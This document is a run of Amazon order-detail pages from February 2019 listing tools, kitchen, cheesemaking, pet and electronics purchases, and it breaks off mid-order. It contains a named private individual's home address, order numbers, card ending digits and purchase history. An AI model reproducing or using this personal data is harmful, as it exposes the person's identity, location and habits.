DC 20010 Grand Total:$44.55 United States Credit Card transactions AmazonPLCC ending in 3157: February 25, 2019:$44.55 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #113-1222145-0133859 Order Placed: February 22, 2019 Amazon.com order number: 113-1222145-0133859 Order Total: $7.99 Shipped on February 23, 2019 Items Ordered Price 1 of: Lock Laces (Elastic No Tie Shoelaces (White) Sold by: Positive Distribution LLC / LOCK LACES (seller profile) $7.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $7.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $7.99 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$7.99 United States Credit Card transactions AmazonPLCC ending in 3157: February 23, 2019:$7.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-3057826-6561034 Order Placed: February 22, 2019 Amazon.com order number: 114-3057826-6561034 Order Total: $52.15 Shipped on February 23, 2019 Items Ordered 1 of: Genuine Instant Pot Silicone Springform Cake Pan Sold by: Amazon.com Services LLC Price $12.95 Condition: New 1 of: Year of Plenty BPA-Free, Clear Fermentation Lids -Set of 4 -for Making Sauerkraut in Wide Mouth Mason Jars -Includes Instructions, Recipe and Gift Box for Storage… (Clear) Sold by: Making It Work, Inc. (seller profile) $18.93 Condition: New 1 of: Jetec Self-adhesive Cable Labels Waterproof Wire Label Tear Resistant Marker and 12 Pieces Reusable Hook and Loop Cord Straps, 8 Colors, 240 Pieces Sold by: JetecOnline (seller profile) $8.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on February 23, 2019 Items Ordered 1 of: Neodymium Rare Earth for Magnets, Hooks, Disc,Permanent, DIY,Building, Scientific, Craft,Fridge, DIY,Scientific and Office (5-Size Kit/A) Sold by: ELECFIND (seller profile) Price $10.50 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Print this page for your records. Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $51.37 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $51.37BRIAN J COADY Estimated tax to be collected: $0.781454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$52.15 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-1582793-7541032 Order Placed: February 22, 2019 Amazon.com order number: 114-1582793-7541032 Order Total: $50.07 Shipped on February 25, 2019 Items Ordered Price 1 of: OXO Good Grips Silicone Steamer, Green $14.95 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Shipped on February 23, 2019 Items Ordered Price 1 of: New England Cheesemaking Vegetable Rennet Tablets, Strip of 10 $9.99 Sold by: New England Cheesemaking Supply Company (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Shipped on February 23, 2019 Items Ordered Price 1 of: Great Neck L11S Long Nose Pliers Sold by: We Sell Tools (seller profile) $5.98 Condition: New . 1 of: 6-Pack Easy Fermentation Glass Weights with Handles for Keeping Vegetables $14.99 Submerged During Fermenting and Pickling, Fits for Any Wide Mouth Mason Jars, FDA-Apporved Food Grade Materials Sold by: H&Q products (seller profile) Condition: New 1 of: Prime-Line U 10446 Hole Cover Plate, For Use With 1-3/4 in Thick Doors, 2-5/8 $3.08 in Dia, Steel, Chrome, PRIME LINE PRODUCTS Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Payment information Payment Method: Item(s) Subtotal: $48.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $48.99BRIAN J COADY Estimated tax to be collected: $1.081454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$50.07 United States Credit Card transactions AmazonPLCC ending in 3157: February 25, 2019:$50.07 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-6543658-2733018 Order Placed: February 18, 2019 Amazon.com order number: 113-6543658-2733018 Order Total: $0.00 Shipped on February 18, 2019 Items Ordered Price 1 of: Neiko 10043A Phillips and Flathead Screwdriver Power Driver Bit Set, 5 Piece | 12" Extra Long Length | 1/4" Shank Sold by: Amazon.com Services LLC $0.00 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $0.00 Gift Card Shipping & Handling: $0.00 Billing address Total before tax: $0.00Brian J Coady Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$0.00 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-7729584-2365847 Order Placed: February 15, 2019 Amazon.com order number: 114-7729584-2365847 Order Total: $22.99 Shipped on February 15, 2019 Items Ordered Price 1 of: Sand Dipper Jr -Adjustable -Extra Long Handle Back Saver Hygienic Cat Litter Scoop Sold by: GOBUDi (seller profile) $22.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $22.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $22.99BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$22.99 United States Credit Card transactions AmazonPLCC ending in 3157: February 15, 2019:$22.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-2034090-9009053 Order Placed: February 14, 2019 Amazon.com order number: 114-2034090-9009053 Order Total: $0.00 Shipped on February 15, 2019 Items Ordered Price 2 of: Sony NP-BX1/M8 Lithium-Ion X Type Battery (Silver), SONY $31.52 Sold by: Amazon.com Services LLC Condition: New 1 of: Sony SF-G128/T1 High Performance 128GB SDXC UHS-II Class 10 U3 Memory $196.22 Card with Blazing Fast Read Speed up to 300MB/s Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $259.26 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Rewards Points Total before tax: $259.26Billing address Estimated tax to be collected: $15.55BRIAN J COADY Rewards Points:-$274.81 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total: $0.00United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-9638434-8557868 Order Placed: February 14, 2019 Amazon.com order number: 114-9638434-8557868 Order Total: $39.90 Shipped on February 14, 2019 Items Ordered Price 1 of: The Ultimate -Drill Brush -Cleaning Supplies -Kit -Bathroom Accessories Shower Cleaner -Bath Mat -Kitchen Accessories -Grout Cleaner -Dish Brush -Stove $25.95 -Oven -Sink -Outdoor -Scrub Brush Sold by: Drillbrush (seller profile) | Product question? Ask Seller Condition: New 1 of: Drillbrush 3 Piece Drill Brush Cleaning Tool Attachment Kit for Scrubbing/Cleaning Tile, Grout, Shower, Bathtub, and All Other General Purpose Scrubbing (Automotive Soft-White) Sold by: Drillbrush (seller profile) | Product question? Ask Seller $13.95 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: One-Day Shipping Payment information Payment Method: Item(s) Subtotal: $39.90 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $9.98 Free Shipping: -$9.98 Billing address BRIAN J COADY Total before tax: $39.90 1454 MONROE ST NW Estimated tax to be collected: $0.00 WASHINGTON, DC 20010 United States Grand Total:$39.90 Credit Card transactions AmazonPLCC ending in 3157: February 14, 2019:$39.90 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #114-7279775-2766607 Order Placed: February 9, 2019 Amazon.com order number: 114-7279775-2766607 Order Total: $16.79 Shipped on February 11, 2019 Items Ordered 1 of: Dead Blow Hammer Ball Pein 1Lb Dual Face Flat & Peen Steel Metal Working 16oz Sold by: JETS INC (seller profile) Price $16.79 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $16.79 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $16.79BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$16.79 United States Credit Card transactions AmazonPLCC ending in 3157: February 11, 2019:$16.79 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-6744743-9073822 Order Placed: February 9, 2019 Amazon.com order number: 114-6744743-9073822 Order Total: $77.20 Shipped on February 16, 2019 Items Ordered Price 1 of: Gear Aid, Tenacious Tape Gear Patches, Varies Sizes, Reflective, Silver $7.76 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Shipped on February 12, 2019 Items Ordered Price 1 of: SE 837-9TM Texturing Hammer with 9 Different Interchangeable Tips $10.00 Sold by: Amazon.com Services LLC Condition: New 1 of: Lemorele Smart Fingerprint Lock Portable Fingerprint Padlock Security No $49.99 Password 1 Second Fast Unlock Lightweight Waterproof for Suitcases, Golf Bags, Handbags, School Bags(Gold) Sold by: MSU-US (seller profile) | Product question? Ask Seller Condition: New 1 of: ARROW 160376 1-1/4" Cup Hooks (Pack of 18), Rubbed Bronze $3.59 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Shipping Speed: No-Rush Shipping Shipped on February 12, 2019 Items Ordered Price 1 of: Gear Aid Seam Grip WP Waterproof Sealant and Adhesive for Tents and Outdoor Fabric, Clear, 1 oz Sold by: Amazon.com Services LLC $4.31 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Payment information Payment Method: Item(s) Subtotal: $75.65 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $75.65BRIAN J COADY Estimated tax to be collected: $1.551454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$77.20 United States Credit Card transactions AmazonPLCC ending in 3157: February 16, 2019:$22.64 AmazonPLCC ending in 3157: February 12, 2019:$54.56 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-3739732-4181855 Order Placed: February 13, 2019 Amazon.com order number: 114-3739732-4181855 Order Total: $22.93 Shipped on February 14, 2019 Items Ordered Price 1 of: Neiko 10043A Phillips and Flathead Screwdriver Power Driver Bit Set, 5 Piece | 12" Extra Long Length | 1/4" Shank Sold by: Amazon.com Services LLC $12.21 Condition: New 1 of: Yakamoz 6Pcs 1/4 Hex Shank Magnetic Cross Phillips Screw Head Screwdriver Bits Set Power Tools | 5.9-Inch Length Sold by: Yakamoz (seller profile) $9.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $22.20 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $22.20 BRIAN J COADY Estimated tax to be collected: $0.73 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$22.93 United States Credit Card transactions AmazonPLCC ending in 3157: February 14, 2019:$22.93 Final Details for Order #114-0390513-9869822 Order Placed: February 13, 2019 Amazon.com order number: 114-0390513-9869822 Order Total: $46.97 Shipped on February 16, 2019 Items Ordered Price 1 of: Lever-Nut Assortment Conductor Compact Wire Connectors pct-212 25pcs pct213 25pcs pct-214 25pcs pct-215 25pcs (100 pcs ) Sold by: Rain force (seller profile) $25.99 Condition: New 1 of: Kuject 50PCS Solder Seal Wire Connectors, Waterproof Insulated Heat Shrink Butt Terminals Splice Connectors for Marine Automotive Car Boat Sold by: KujectDirect (seller profile) | Product question? Ask Seller $13.99 Condition: New 1 of: DOWELL 10-22 AWG Wire Stripper,Wire Crimper And Multi-Function Hand Tool… $6.99 Professional Handle Design And Refined Craftsmanship. Sold by: DOWELL TOOLS (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Payment information Payment Method: Item(s) Subtotal: $46.97 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $46.97 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$46.97 United States Credit Card transactions AmazonPLCC ending in 3157: February 16, 2019:$46.97 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #114-2074317-5611404 Order Placed: February 13, 2019 Amazon.com order number: 114-2074317-5611404 Order Total: $32.89 Shipped on February 16, 2019 Items Ordered Price 1 of: USEVEN Moth Balls for Clothes Storage, 100% Natural Repellent Aromatic Value $17.99 Pack (4 Lavender Sachets, 4 Cedar Sachets, 10 Cedar Blocks, 30 Camphor Wood Root Balls, 1 Gift) Sold by: USEVEN (seller profile) | Product question? Ask Seller Condition: New 1 of: RakrisaSupplies Purple Bags Pack of 15 | Natural Deodorizer, Moth Repellent, $14.90 Highest Fragrance Lavender Scent Sachets | LS-001 Sold by: Rakrisa & Co (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Payment information Payment Method: Item(s) Subtotal: $32.89 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $32.89 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$32.89 United States Credit Card transactions AmazonPLCC ending in 3157: February 16, 2019:$32.89 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #114-5266092-2790600 Order Placed: February 13, 2019 Amazon.com order number: 114-5266092-2790600 Order Total: $74.24 Shipped on February 14, 2019 Items Ordered Price 1 of: Neiko 01323A Ultra Low Profile Offset Screwdriver Set, 5-Piece | Heavy Duty S2 $10.99 Steel Construction Sold by: Go Industrial Tools (seller profile) Condition: New 1 of: PetSafe Drinkwell Dog and Cat Water Fountain Cleaning Kit, 3 Brushes $4.50 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on February 15, 2019 Items Ordered Price 1 of: Uniclife Pet Water Fountain, Dog Cat Automatic Electric Drinking Bowl with LED $12.49 Light (Filter for Cube Fountain) Sold by: Uniclife (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Shipped on February 14, 2019 Items Ordered Price 1 of: Eleoption 1.8L Large Capacity Automatic Pets Water Drinking Filter Fountain Bowl $45.99 with LED Light Safety for Dogs Cars (1.8L with Light+UV) Sold by: Creeracity (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $73.97 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $73.97 BRIAN J COADY Estimated tax to be collected: $0.271454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$74.24 United States Credit Card transactions AmazonPLCC ending in 3157: February 15, 2019:$74.24 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-9713642-6479430 Order Placed: February 13, 2019 Amazon.com order number: 114-9713642-6479430 Order Total: $13.24 Shipped on February 13, 2019 Items Ordered 1 of: DEWALT DWHT55518 13-Inch Spring Steel Flat bar Sold by: Amazon.com Services LLC Price $12.49 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Payment information Payment Method: Item(s) Subtotal: $12.49 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $12.49 BRIAN J COADY Estimated tax to be collected: $0.751454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$13.24 United States Credit Card transactions AmazonPLCC ending in 3157: February 13, 2019:$13.24 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-1163616-3239437 Order Placed: February 13, 2019 Amazon.com order number: 114-1163616-3239437 Order Total: $24.79 Shipped on February 13, 2019 Items Ordered Price 1 of: Comforday Multi-Purpose Handheld Pressurized Steam Cleaner with 9-Piece $34.99 Accessories for Stain Removal, Carpets, Curtains, Car Seats, Kitchen Surface & Much More (Yellow) Sold by: Deal Republic (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $34.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Lightning Deal:-$10.20 Billing address BRIAN J COADY Total before tax: $24.791454 MONROE ST NW Estimated tax to be collected: $0.00WASHINGTON, DC 20010 United States Grand Total:$24.79 Credit Card transactions AmazonPLCC ending in 3157: February 13, 2019:$24.79 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-7160474-5704210 Order Placed: February 12, 2019 Amazon.com order number: 114-7160474-5704210 Seller's order number: 754845450285 Order Total: $9.49 Shipped on February 13, 2019 Items Ordered 1 of: Butter Muslin 2 sq yards Sold by: New England Cheesemaking Supply Company (seller profile) Price $9.49 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $9.49 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $9.49BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$9.49 United States Credit Card transactions AmazonPLCC ending in 3157: February 13, 2019:$9.49 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-2274115-2509822 Order Placed: February 12, 2019 Amazon.com order number: 114-2274115-2509822 Order Total: $11.49 Shipped on February 16, 2019 Items Ordered 1 of: Mesophilic Culture -MM100 Sold by: Standing Stone Farms Cheese Making (seller profile) | Product question? Ask Seller Price $11.49 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $11.49 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $11.49 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$11.49 United States Credit Card transactions AmazonPLCC ending in 3157: February 16, 2019:$11.49 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-0341831-9154605 Order Placed: February 12, 2019 Amazon.com order number: 114-0341831-9154605 Order Total: $29.98 Shipped on February 12, 2019 Items Ordered Price 1 of: Steamer Basket, Egg Rack Holder, 7" Non-stick Springform Cake Pan, 50 Pcs $19.99 Cake Paper for Instant Pot Accessories, Vegetable Food Steamer Rack. Fit Pot 5,6,8 qt Pressure Cooker, Stainless Steel, 4 Pcs Sold by: OYSIR (seller profile) | Product question? Ask Seller Condition: New 1 of: Erythritol Sweetener Natural Sugar Substitute 1lb -Granulated Low Calorie $9.99 Sweetener High Digestive Tolerance Suitable for Diabetes Keto and Paleo -Perfect Baking Substitute Non GMO Sold by: JSI Comm (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $29.98 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $29.98 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$29.98 United States Credit Card transactions AmazonPLCC ending in 3157: February 13, 2019:$29.98 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #114-4187798-3100221 Order Placed: February 9, 2019 Amazon.com order number: 114-4187798-3100221 Order Total: $41.97 Shipped on February 11, 2019 Items Ordered Price 1 of: Oasser Digital Tire Pressure Gauge with Tire Inflator Deflator Air Compressor Accessories with Dual Head Air Chuck 1/4" NPT Backlit LCD 255PSI P5 Sold by: Bocath Direct (seller profile) | Product question? Ask Seller $27.99 Condition: New 1 of: Brightt 9-in-1 Digital Tire Pressure Gauge 150PSI with Multi Functional Rescue Tools of LED Flashlight, Car Hammer, Seatbelt Cutter, Screw Drivers, Scissors and Pliers for Car, All Vehicles Sold by: Hot Ride USA (seller profile) $13.98 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $41.97 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $41.97 BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$41.97 United States Credit Card transactions AmazonPLCC ending in 3157: February 11, 2019:$41.97 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #114-3234235-4275468 Order Placed: February 8, 2019 Amazon.com order number: 114-3234235-4275468 Order Total: $7.97 Shipped on February 8, 2019 Items Ordered Price 1 of: Stark Safe Cut Resistant Gloves (1 Pair) Food Grade Level 5 Protection, Safety Cutting Gloves for Kitchen, Mandolin Slicing, Fish Fillet, Oyster Shuck Sold by: Youphoria (seller profile) | Product question? Ask Seller $7.97 Condition: New New -Straight From Manufacturer Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $7.97 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $7.97BRIAN J COADY Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$7.97 United States Credit Card transactions AmazonPLCC ending in 3157: February 8, 2019:$7.97 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-3923921-1537810 Order Placed: February 8, 2019 Amazon.com order number: 114-3923921-1537810 Order Total: $57.54 Shipped on February 12, 2019 Items Ordered Price 1 of: Multipurpose 4-inch Replaceable Razor Blade Scraper with 10pcs $9.99 High Carbon Steel Blades | For Painting Stripping, Window Film Glass Glue Cleaning, Tile Adhesive Removing Sold by: Vanly Trade. (seller profile) Condition: New 1 of: BearMoo Whetstone 2-IN-1 Sharpening Stone 3000/8000 Grit $21.99 Waterstone, Knife Sharpener Rubber Stone Holder Included Sold by: BearMooTek (seller profile) Condition: New 1 of: Titan Tools 11508 1-1/4" Offset Stainless Steel Scraper $9.97 Sold by: Amazon.com Services LLC (Monthly service Condition: New charge billed by service provider) Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Shipped on February 13, 2019 Items Ordered Price 1 of: ABN Razor Blade Scraper 4-Piece Tool Set PLUS Replacement Blades – Glass Car $14.99 Windshield Window Adhesive Decal Remover Sold by: Autobodynow (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Payment information Payment Method: Item(s) Subtotal: $56.94 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $56.94 BRIAN J COADY Estimated tax to be collected: $0.601454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$57.54 United States Credit Card transactions AmazonPLCC ending in 3157: February 13, 2019:$57.54 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-2490769-1974635 Subscribe and Save Order Placed: February 8, 2019 Amazon.com order number: 114-2490769-1974635 Order Total: $1.14 This order contains Subscribe & Save items. Shipped on March 3, 2019 Items Ordered Price 1 of: 4.4 LB Dishwasher Salt/Water Softener Salt -Compatible with Bosch, Miele, Whirlpool, Thermador and More (2 KG) Sold by: Impresa Products (seller profile) | Product question? Ask Seller $16.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $16.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$0.85 Billing address Total before tax: $16.14BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW Gift Card Amount:-$15.00 WASHINGTON, DC 20010 United States Grand Total: $1.14 Credit Card transactions AmazonPLCC ending in 3157: March 3, 2019:$1.14 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-3792207-0402657 Order Placed: February 7, 2019 Amazon.com order number: 114-3792207-0402657 Order Total: $27.86 Shipped on February 8, 2019 Items Ordered Price 1 of: E11 LED Bulb, Mini Candelabra Base, 100W 120W Halogen Bulb $19.50 Replacement,10W,1100LM, AC120V, Dimmable E11 LED Light Bulb, Patented Product, for Indoor Decorative Lighting, Warm White 3000K, 2-Pack Sold by: MGYOLED (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on February 8, 2019 Items Ordered Price 1 of: Dap 21506 Plastic Wood Filler, 16-Ounce $7.89 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $27.39 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $27.39 BRIAN J COADY Estimated tax to be collected: $0.47 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$27.86 United States Credit Card transactions AmazonPLCC ending in 3157: February 8, 2019: $8.36 AmazonPLCC ending in 3157: February 8, 2019:$19.50 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #114-2401116-3430618 Order Placed: February 7, 2019 Amazon.com order number: 114-2401116-3430618 Order Total: $14.99 Shipped on February 8, 2019 Items Ordered Price 1 of: E11 led Light Bulbs Dimmable, 75W 100W JD E11 Mini Candelabra Base 120V Halogen Bulbs Replacement(75W Equivalent), Daylight White 6000K Pack of 2 (Daylight White) Sold by: Shenzhen jiayipin Technology CoLtd. (seller profile) $14.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $14.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $14.99BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$14.99 United States Credit Card transactions AmazonPLCC ending in 3157: February 8, 2019:$14.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-9952216-1390616 Order Placed: February 7, 2019 Amazon.com order number: 114-9952216-1390616 Order Total: $13.99 Shipped on February 8, 2019 Items Ordered 1 of: (5 Packs) Phonak Cerustop Filters Sold by: Castle Hearing (seller profile) Price $13.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $13.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $13.99 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$13.99 United States Credit Card transactions AmazonPLCC ending in 3157: February 8, 2019:$13.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-3419224-3863429 Order Placed: February 5, 2019 Amazon.com order number: 114-3419224-3863429 Order Total: $0.00 Shipped on February 6, 2019 Items Ordered 1 of: Fengbao 2PCS Kitchen 